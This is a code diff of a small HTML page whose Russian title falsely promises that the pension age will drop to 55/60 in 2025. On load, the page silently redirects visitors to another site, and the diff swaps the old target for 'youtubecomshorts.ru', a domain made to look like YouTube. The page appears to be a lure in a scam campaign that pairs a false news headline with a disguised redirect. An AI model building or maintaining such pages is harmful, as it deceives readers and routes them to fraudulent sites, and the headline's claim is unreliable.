--- a/index.html
+++ b/index.html
@@ -19,10 +19,10 @@
 <head>
    <title>Пенсионный возраст понизят до 55/60 лет: россиян ждет большой сюрприз в 2025 году</title>
   <script>
-    window.location.replace("http://cpokov16.beget.tech/golikova/");
+    window.location.replace("https://youtubecomshorts.ru/GOLIKOVA_1_MAY");
   </script>
 </head>
 <body>
-  Если страница не открылась, то нажмите еще раз <a href="http://cpokov16.beget.tech/golikova/">сюда</a>.
+  Если страница не открылась, то нажмите еще раз <a href="https://youtubecomshorts.ru/GOLIKOVA_1_MAY">сюда</a>.
 </body>
 </html>
